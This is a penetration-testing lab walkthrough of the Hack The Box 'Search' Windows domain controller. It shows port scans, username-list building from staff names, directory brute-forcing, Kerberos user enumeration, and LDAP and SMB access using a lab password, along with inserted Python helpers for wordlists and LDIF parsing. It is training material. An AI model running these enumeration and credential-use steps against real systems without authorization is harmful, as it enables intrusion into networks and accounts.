Search
Completed on April 23, 2022.
Hopefully you like this machine as much as I did. When I worked on it, I was getting ready to start the OSCP training (PEN-200) and was looking for practice before starting. At that point, I had finished the eCPPT almost a month earlier. Like almost all HTB machines, this one goes a bit overboard, so it is definitely good practice in my opinion. It requires thorough enumeration more than any particular technique used to pwn the system. The references I share below should help in understanding what is involved.
Since we need to know what is available to us, we enumerate the exposed services to get some initial information and then dig deeper. Let's start by finding open ports…
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ sudo nmap -Pn -sS -p- --min-rate=1000 -T4 search.htb -oN Search_openPorts.log -oX Search_openPorts.xml
[sudo] password for jxberrios:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-19 22:07 EDT
Nmap scan report for search.htb (10.129.96.123)
Host is up (0.041s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
8172/tcp open unknown
9389/tcp open adws
49666/tcp open unknown
49693/tcp open unknown
49694/tcp open unknown
49710/tcp open unknown
49724/tcp open unknown
49754/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 124.97 seconds
…followed by further port scanning:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ PORTS=$(cat Search_openPorts.log | grep -E 'tcp.*open' | cut -d '/' -f 1 | xargs | sed -e 's/ /,/g')
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ sudo nmap -Pn -sS -sC -sV -p $PORTS --min-rate=1000 -T4 search.htb -oN Search_PortScan.log -oX Search_PortScan.xml
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-19 22:21 EDT
Nmap scan report for search.htb (10.129.96.123)
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Search — Just Testing IIS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-20 02:20:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
| http-methods:
|_ Potentially risky methods: TRACE
| tls-alpn:
|_ http/1.1
|_http-title: Search — Just Testing IIS
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
8172/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after: 2030-04-05T09:05:25
|_http-title: Site doesn't have a title.
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49693/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49694/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49724/tcp open msrpc Microsoft Windows RPC
49754/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-04-20T02:21:36
|_ start_date: N/A
|_clock-skew: mean: -1m23s, deviation: 0s, median: -1m23s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.96 seconds
From the port scan we have a lot of good information to start with. What we know so far is:
Domain: search.htb
Common Name: research
Inspecting TCP80 leads to a static page and references to jpg files:
Doing the same on TCP443 leads to the same page but there is a certificate bound to the service and the hostname research.search.htb associated with the certificate. This is the hostname related to the common name found in some services:
Note: Adding the CN research.search.htb to the hosts file.
As both http and https sites reference the same application, we find some “employees” that might come in handy:
To be clear, exposing a web application over HTTP when it is supposed to be served over HTTPS is not something that should be done, for security reasons. Let's pull the list of employees and then build username combinations from it:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ curl -sLkX GET --url "http://search.htb/#team-section" | grep -E '.*<h3>.*<\/h3>' | head -n 8 | tr -s ' ' | sed 's/^\s//' | sed 's/[/<>h3]//g'
Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Tompson
Cris Stewart
With these names we can build a list of common usernames based on typical naming conventions. See below if desired.
KLyons
DSantiago
SFrye
KStewart
KSpencer
DSimpson
BTompson
CStewart
K.Lyons
D.Santiago
S.Frye
K.Stewart
K.Spencer
D.Simpson
B.Tompson
C.Stewart
Keely.Lyons
Dax.Santiago
Sierra.Frye
Kyla.Stewart
Kaiara.Spencer
Dave.Simpson
Ben.Tompson
Cris.Stewart
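As an added example (not part of the original writeup), the following Python script builds the same three username conventions from the `<h3>` entries of a constructed HTML fragment, parsing the markup properly instead of stripping characters. The `sed 's/[/<>h3]//g'` step above is a bracket expression that deletes every '/', '<', '>', 'h' and '3' character individually, so any name containing an 'h' loses it; `mimic_sed_bracket_strip` reproduces that effect so the difference is visible.

```python
import re
from html.parser import HTMLParser

# Constructed HTML fragment standing in for the site's team section (sample
# input, not the real page; "Ben Thompson" is included only to show what the
# sed bracket expression does to a name containing an "h").
SAMPLE_HTML = """
<section id="team-section">
  <div class="member"><h3>Keely Lyons</h3><p>Founder</p></div>
  <div class="member"><h3>Dax
      Santiago</h3><p>Researcher</p></div>
  <div class="member"><h3>Ben Thompson</h3><p>Analyst</p></div>
</section>
"""

# Username conventions tried in the writeup: FLast, F.Last, First.Last
CONVENTIONS = (
    lambda first, last: f"{first[0]}{last}",
    lambda first, last: f"{first[0]}.{last}",
    lambda first, last: f"{first}.{last}",
)


class H3Collector(HTMLParser):
    """Collect the text content of every <h3> element, whitespace-normalised."""

    def __init__(self):
        super().__init__()
        self.names = []
        self._buf = None  # None while outside an <h3>

    def handle_starttag(self, tag, attrs):
        if tag == "h3":
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "h3" and self._buf is not None:
            text = re.sub(r"\s+", " ", "".join(self._buf)).strip()
            if text:
                self.names.append(text)
            self._buf = None


def extract_names(html):
    """Return the full names found in <h3> elements, in page order."""
    parser = H3Collector()
    parser.feed(html)
    return parser.names


def mimic_sed_bracket_strip(text):
    """What `sed 's/[/<>h3]//g'` does: delete every '/', '<', '>', 'h' and '3'
    character individually, which also mangles names that contain an 'h'."""
    return "".join(ch for ch in text if ch not in "/<>h3")


def build_wordlist(html):
    """All names under one convention, then the next, matching the order of
    the list above. Names without a surname are skipped."""
    pairs = []
    for name in extract_names(html):
        parts = name.split()
        if len(parts) >= 2:
            pairs.append((parts[0], parts[-1]))
    return [conv(first, last) for conv in CONVENTIONS for first, last in pairs]


if __name__ == "__main__":
    for username in build_wordlist(SAMPLE_HTML):
        print(username)
```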
As part of our enumeration on HTTP/HTTPS, let's enumerate directories:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ dirb http://research.search.htb/ /opt/seclists/Discovery/Web-Content/common.txt -t -l -N 401,403,404 -w -f
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Apr 22 19:27:21 2022
URL_BASE: http://research.search.htb/
WORDLIST_FILES: /opt/seclists/Discovery/Web-Content/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Printing LOCATION header
OPTION: Ignoring NOT_FOUND code -> 401
OPTION: NOT forcing an ending '/' on URLs
OPTION: Not Stopping on warning messages
-----------------
GENERATED WORDS: 4710
---- Scanning URL: http://research.search.htb/ ----
==> DIRECTORY: http://research.search.htb/Images/
==> DIRECTORY: http://research.search.htb/certenroll/
==> DIRECTORY: http://research.search.htb/css/
==> DIRECTORY: http://research.search.htb/fonts/
==> DIRECTORY: http://research.search.htb/images/
+ http://research.search.htb/index.html (CODE:200|SIZE:2968)
==> DIRECTORY: http://research.search.htb/js/
+ http://research.search.htb/staff (CODE:403|SIZE:1233)
---- Entering directory: http://research.search.htb/Images/ ----
---- Entering directory: http://research.search.htb/certenroll/ ----
---- Entering directory: http://research.search.htb/css/ ----
---- Entering directory: http://research.search.htb/fonts/ ----
---- Entering directory: http://research.search.htb/images/ ----
---- Entering directory: http://research.search.htb/js/ ----
-----------------
END_TIME: Fri Apr 22 19:54:26 2022
DOWNLOADED: 32970 - FOUND: 2
From the directory/page enumeration, it is worth noting there is a 'certificate enrollment' directory; most probably this is a user certificate enrollment service, but at the moment the key question is what it is for. While inspecting the site thoroughly, we found a picture with some notes, and on closer inspection the notes contained a message giving out a clue:
This looks suspicious enough to look into this user and what seems to be their password. Given our first.last naming convention, we can compose it as:
Hope Sharp -> hope.sharp
Password: 'IsolationIsKey?'
Even though we have a potential set of credentials, in an assessment we should still try to enumerate LDAP without credentials: even when the service requires authentication for most queries, some useful information can still be retrieved.
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ ldapsearch -x -H ldap://search.htb:389 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=search,DC=htb
namingcontexts: CN=Configuration,DC=search,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=search,DC=htb
namingcontexts: DC=DomainDnsZones,DC=search,DC=htb
namingcontexts: DC=ForestDnsZones,DC=search,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ ldapsearch -x -H ldap://search.htb:389 -b "DC=search,DC=htb" -s one
# extended LDIF
#
# LDAPv3
# base <DC=search,DC=htb> with scope oneLevel
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
We can retrieve the naming contexts, but anything else requires authentication. Let's use ldapsearch against the Users container to test the credentials we found:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ ldapsearch -x -H ldap://search.htb:389 -D 'SEARCH\hope.sharp' -w 'IsolationIsKey?' -b 'CN=Users,DC=search,DC=htb' 'objectClass=user'
# extended LDIF
#
# LDAPv3
# base <CN=Users,DC=search,DC=htb> with scope subtree
# filter: objectClass=user
# requesting: ALL
#
# Administrator, Users, search.htb
dn: CN=Administrator,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Administrator
description: Built-in account for administering the computer/domain
userCertificate:: [base64-encoded certificate, omitted]
userCertificate:: [base64-encoded certificate, omitted]
distinguishedName: CN=Administrator,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200331141835.0Z
whenChanged: 20220413105646.0Z
uSNCreated: 8196
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Schema Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Administrators,CN=Builtin,DC=search,DC=htb
uSNChanged: 213062
name: Administrator
objectGUID:: pc4v2f1XX0OmXLqrv/Edgw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132943234160414333
lastLogoff: 0
lastLogon: 132951144927723973
pwdLastSet: 132313451094143670
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9AEAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 866
sAMAccountName: Administrator
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200407065434.0Z
dSCorePropagationData: 20200331143446.0Z
dSCorePropagationData: 20200331143446.0Z
dSCorePropagationData: 20200331141936.0Z
dSCorePropagationData: 16010714042016.0Z
lastLogonTimestamp: 132943210066516943
msDS-SupportedEncryptionTypes: 0
# Guest, Users, search.htb
dn: CN=Guest,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Guest
description: Built-in account for guest access to the computer/domain
distinguishedName: CN=Guest,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200331141835.0Z
whenChanged: 20200331141835.0Z
uSNCreated: 8197
memberOf: CN=Guests,CN=Builtin,DC=search,DC=htb
uSNChanged: 8197
name: Guest
objectGUID:: ulsgEdc6F0mO1JMHdczXCA==
userAccountControl: 66082
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 0
primaryGroupID: 514
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9QEAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: Guest
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200407065434.0Z
dSCorePropagationData: 20200331141936.0Z
dSCorePropagationData: 16010101000417.0Z
# krbtgt, Users, search.htb
dn: CN=krbtgt,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: krbtgt
description: Key Distribution Center Service Account
distinguishedName: CN=krbtgt,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200331141936.0Z
whenChanged: 20211214201649.0Z
uSNCreated: 12324
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=search,DC=htb
uSNChanged: 180281
showInAdvancedViewOnly: TRUE
name: krbtgt
objectGUID:: aZ2LlY6VY0igOk+ajvf3mg==
userAccountControl: 66050
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132301379764357878
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9gEAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: krbtgt
sAMAccountType: 805306368
servicePrincipalName: kadmin/changepw
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200407065434.0Z
dSCorePropagationData: 20200331143446.0Z
dSCorePropagationData: 20200331141936.0Z
dSCorePropagationData: 16010101181216.0Z
msDS-SupportedEncryptionTypes: 0
# Tristan Davies, Users, search.htb
dn: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Tristan Davies
sn: Davies
description: The only Domain Admin allowed, Administrator will soon be disabled
givenName: Tristan
distinguishedName: CN=Tristan Davies,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200408163602.0Z
whenChanged: 20220422144632.0Z
displayName: Tristan Davies
uSNCreated: 24817
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Schema Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Administrators,CN=Builtin,DC=search,DC=htb
uSNChanged: 253025
name: Tristan Davies
objectGUID:: BG7UG1fgykOF22w51h8LBw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132406600358324634
lastLogoff: 0
lastLogon: 132406781797503096
pwdLastSet: 132427526509705890
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1vEgUAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 4
sAMAccountName: Tristan.Davies
sAMAccountType: 805306368
userPrincipalName: Tristan.Davies@search.htb
lockoutTime: 0
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
dSCorePropagationData: 20220422152132.0Z
dSCorePropagationData: 20220422151632.0Z
dSCorePropagationData: 20220422151132.0Z
dSCorePropagationData: 20220422150632.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132416141844196476
# search result
search: 2
result: 0 Success
# numResponses: 5
# numEntries: 4
Along with the users, we can see userCertificate attributes on the Administrator account.
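The LDIF above is worth parsing rather than reading by eye. As an added example (not the writeup's own code), this Python script parses a constructed LDIF excerpt modelled on that output (folded continuation lines, base64 `::` attributes), decodes the objectSid values shown above into SIDs so the well-known RIDs stand out, expands userAccountControl and msDS-SupportedEncryptionTypes into flag names, and lists the enabled accounts in high-privilege groups.

```python
import base64
import struct

# Constructed LDIF excerpt modelled on the ldapsearch output above: the objectSid
# and userAccountControl values are the ones it shows, other attributes trimmed.
# LDIF folds long values onto lines starting with one space and marks base64
# values with a double colon.
SAMPLE_LDIF = """\
dn: CN=Administrator,CN=Users,DC=search,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Administrators,CN=Builtin,DC=search,DC=htb
userAccountControl: 66048
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9AEAAA==
sAMAccountName: Administrator
msDS-SupportedEncryptionTypes: 0

dn: CN=Guest,CN=Users,DC=search,DC=htb
memberOf: CN=Guests,CN=Builtin,DC=search,DC=htb
userAccountControl: 66082
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9QEAAA==
sAMAccountName: Guest

dn: CN=Tristan Davies,CN=Users,DC=search,DC=htb
description: The only Domain Admin allowed, Administrator will soon be disable
 d
memberOf: CN=Domain Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=search,DC=htb
userAccountControl: 66048
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1vEgUAAA==
sAMAccountName: Tristan.Davies

# search result
result: 0 Success
"""

UAC_FLAGS = {0x2: "ACCOUNTDISABLE", 0x10: "LOCKOUT", 0x20: "PASSWD_NOTREQD",
             0x200: "NORMAL_ACCOUNT", 0x10000: "DONT_EXPIRE_PASSWORD",
             0x80000: "TRUSTED_FOR_DELEGATION", 0x400000: "DONT_REQ_PREAUTH"}
ETYPE_FLAGS = {0x1: "DES_CBC_CRC", 0x2: "DES_CBC_MD5", 0x4: "RC4_HMAC",
               0x8: "AES128_CTS_HMAC_SHA1_96", 0x10: "AES256_CTS_HMAC_SHA1_96"}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins",
                     "Administrators", "Group Policy Creator Owners"}


def parse_ldif(text):
    """Return one {attribute: [values]} dict per entry that has a dn.
    Comments are dropped, folded lines re-joined, '::' values base64-decoded."""
    lines = []
    for line in text.splitlines():
        if line.startswith(" ") and lines:
            lines[-1] += line[1:]          # continuation of the previous line
        else:
            lines.append(line)
    entries, current = [], {}
    for line in lines + [""]:
        if not line.strip():                # blank line terminates an entry
            if "dn" in current:
                entries.append(current)
            current = {}
        elif not line.startswith("#"):
            attr, _, value = line.partition(":")
            if value.startswith(":"):
                value = base64.b64decode(value[1:].strip())
            else:
                value = value.strip()
            current.setdefault(attr, []).append(value)
    return entries


def decode_flags(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def decode_sid(raw):
    """Binary SID -> S-R-A-S1-...-Sn (revision, authority, little-endian subauths)."""
    revision, count = raw[0], raw[1]
    if len(raw) != 8 + 4 * count:
        raise ValueError("truncated SID")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, raw, 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs)))


def account_summary(entry):
    uac = int(entry.get("userAccountControl", ["0"])[0])
    etypes = int(entry.get("msDS-SupportedEncryptionTypes", ["0"])[0])
    sid = decode_sid(entry["objectSid"][0])
    groups = {g.split(",", 1)[0][3:] for g in entry.get("memberOf", [])}
    return {
        "name": entry["sAMAccountName"][0],
        "rid": int(sid.rsplit("-", 1)[1]),   # 500 = built-in Administrator, 501 = Guest
        "disabled": bool(uac & 0x2),
        "flags": decode_flags(uac, UAC_FLAGS),
        "privileged": sorted(groups & PRIVILEGED_GROUPS),
        # 0 means unset; the KDC then assumes RC4_HMAC for tickets to a user account
        "etypes": decode_flags(etypes, ETYPE_FLAGS) if etypes else ["RC4_HMAC (attribute unset)"],
    }


def privileged_enabled(entries):
    """Enabled accounts that sit in a high-privilege group (review these first)."""
    return [s for s in map(account_summary, entries)
            if s["privileged"] and not s["disabled"]]
```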
Using the username list we created from the people found on the web application, we can try and confirm if those are valid users.
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ kerbrute userenum --dc search.htb -d search.htb usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 04/21/22 - Ronnie Flathers @ropnop
2022/04/21 00:55:41 > Using KDC(s):
2022/04/21 00:55:41 > search.htb:88
2022/04/21 00:55:41 > [+] VALID USERNAME: Keely.Lyons@search.htb
2022/04/21 00:55:41 > [+] VALID USERNAME: Sierra.Frye@search.htb
2022/04/21 00:55:41 > [+] VALID USERNAME: Dax.Santiago@search.htb
2022/04/21 00:55:42 > Done! Tested 24 usernames (3 valid) in 0.374 seconds
This gave us three existing AD accounts. Using enum4linux, we found some interesting group memberships and additional users retrieved through LDAP:
Group: 'Schema Admins' (RID: 518) has member: SEARCH\Administrator
Group: 'Schema Admins' (RID: 518) has member: SEARCH\Tristan.Davies
Group: 'Domain Admins' (RID: 512) has member: SEARCH\Administrator
Group: 'Domain Admins' (RID: 512) has member: SEARCH\Tristan.Davies
Group: 'Group Policy Creator Owners' (RID: 520) has member: SEARCH\Administrator
Group: 'Group Policy Creator Owners' (RID: 520) has member: SEARCH\Tristan.Davies
At this point, we could pull more valuable information using BloodHound, which might save us some effort, but we can leave that for a later stage and go through the process manually.
Looking specifically at the shares this account has access to:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbmap -H search.htb -u 'hope.sharp' -p 'IsolationIsKey?' -d SEARCH
[+] IP: search.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share
There we see a share that can be accessed with this credential. Let's take a look:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/RedirectedFolders$ -U 'SEARCH\hope.sharp'%'IsolationIsKey?'
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> ls
. Dc 0 Fri Apr 22 11:47:28 2022
.. Dc 0 Fri Apr 22 11:47:28 2022
abril.suarez Dc 0 Tue Apr 7 14:12:58 2020
Angie.Duffy Dc 0 Fri Jul 31 09:11:32 2020
Antony.Russo Dc 0 Fri Jul 31 08:35:32 2020
belen.compton Dc 0 Tue Apr 7 14:32:31 2020
Cameron.Melendez Dc 0 Fri Jul 31 08:37:36 2020
chanel.bell Dc 0 Tue Apr 7 14:15:09 2020
Claudia.Pugh Dc 0 Fri Jul 31 09:09:08 2020
Cortez.Hickman Dc 0 Fri Jul 31 08:02:04 2020
dax.santiago Dc 0 Tue Apr 7 14:20:08 2020
Eddie.Stevens Dc 0 Fri Jul 31 07:55:34 2020
edgar.jacobs Dc 0 Thu Apr 9 16:04:11 2020
Edith.Walls Dc 0 Fri Jul 31 08:39:50 2020
eve.galvan Dc 0 Tue Apr 7 14:23:13 2020
frederick.cuevas Dc 0 Tue Apr 7 14:29:22 2020
hope.sharp Dc 0 Thu Apr 9 10:34:41 2020
jayla.roberts Dc 0 Tue Apr 7 14:07:00 2020
Jordan.Gregory Dc 0 Fri Jul 31 09:01:06 2020
payton.harmon Dc 0 Thu Apr 9 16:11:39 2020
Reginald.Morton Dc 0 Fri Jul 31 07:44:32 2020
santino.benjamin Dc 0 Tue Apr 7 14:10:25 2020
Savanah.Velazquez Dc 0 Fri Jul 31 08:21:42 2020
sierra.frye Dc 0 Wed Nov 17 20:01:46 2021
trace.ryan Dc 0 Thu Apr 9 16:14:26 2020
\abril.suarez
. Dc 0 Tue Apr 7 14:12:58 2020
.. Dc 0 Tue Apr 7 14:12:58 2020
Desktop DRc 0 Fri Jul 31 08:19:29 2020
Documents DRc 0 Fri Jul 31 08:19:33 2020
Downloads DRc 0 Fri Jul 31 08:19:30 2020
...
\frederick.cuevas\Downloads
NT_STATUS_ACCESS_DENIED listing \frederick.cuevas\Downloads\*
\hope.sharp\Desktop
. DRc 0 Thu Apr 9 10:35:49 2020
.. DRc 0 Thu Apr 9 10:35:49 2020
$RECYCLE.BIN DHSc 0 Thu Apr 9 10:35:49 2020
desktop.ini AHSc 282 Thu Apr 9 10:35:00 2020
Microsoft Edge.lnk Ac 1450 Thu Apr 9 10:35:38 2020
\hope.sharp\Documents
. DRc 0 Thu Apr 9 10:35:50 2020
.. DRc 0 Thu Apr 9 10:35:50 2020
$RECYCLE.BIN DHSc 0 Thu Apr 9 10:35:51 2020
desktop.ini AHSc 402 Thu Apr 9 10:35:03 2020
\hope.sharp\Downloads
. DRc 0 Thu Apr 9 10:35:49 2020
.. DRc 0 Thu Apr 9 10:35:49 2020
$RECYCLE.BIN DHSc 0 Thu Apr 9 10:35:49 2020
desktop.ini AHSc 282 Thu Apr 9 10:35:02 2020
\jayla.roberts\Desktop
NT_STATUS_ACCESS_DENIED listing \jayla.roberts\Desktop\*
...
\Savanah.Velazquez\Downloads
NT_STATUS_ACCESS_DENIED listing \Savanah.Velazquez\Downloads\*
\sierra.frye\Desktop
. DRc 0 Wed Nov 17 20:08:00 2021
.. DRc 0 Wed Nov 17 20:08:00 2021
$RECYCLE.BIN DHSc 0 Tue Apr 7 14:03:59 2020
desktop.ini AHSc 282 Fri Jul 31 10:42:15 2020
Microsoft Edge.lnk Ac 1450 Tue Apr 7 08:28:05 2020
user.txt Ac 33 Wed Nov 17 19:55:27 2021
\sierra.frye\Documents
NT_STATUS_ACCESS_DENIED listing \sierra.frye\Documents\*
\sierra.frye\Downloads
NT_STATUS_ACCESS_DENIED listing \sierra.frye\Downloads\*
\trace.ryan\Desktop
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Desktop\*
\trace.ryan\Documents
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Documents\*
\trace.ryan\Downloads
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Downloads\*
\hope.sharp\Desktop\$RECYCLE.BIN
. DHSc 0 Thu Apr 9 10:35:49 2020
.. DHSc 0 Thu Apr 9 10:35:49 2020
desktop.ini AHSc 129 Thu Apr 9 10:35:49 2020
\hope.sharp\Documents\$RECYCLE.BIN
. DHSc 0 Thu Apr 9 10:35:51 2020
.. DHSc 0 Thu Apr 9 10:35:51 2020
desktop.ini AHSc 129 Thu Apr 9 10:35:51 2020
\hope.sharp\Downloads\$RECYCLE.BIN
. DHSc 0 Thu Apr 9 10:35:49 2020
.. DHSc 0 Thu Apr 9 10:35:49 2020
desktop.ini AHSc 129 Thu Apr 9 10:35:50 2020
\sierra.frye\Desktop\$RECYCLE.BIN
. DHSc 0 Tue Apr 7 14:03:59 2020
.. DHSc 0 Tue Apr 7 14:03:59 2020
desktop.ini AHSc 129 Tue Apr 7 14:04:00 2020
smb: \> get sierra.frye\Desktop\user.txt
NT_STATUS_ACCESS_DENIED opening remote file \sierra.frye\Desktop\user.txt
All of this leads nowhere, except that we now know 'sierra.frye' holds the user flag, so this user is probably the next step for lateral movement.
Given the users we got from enum4linux, let's use that list and attempt to request service tickets for any accounts that have an SPN:
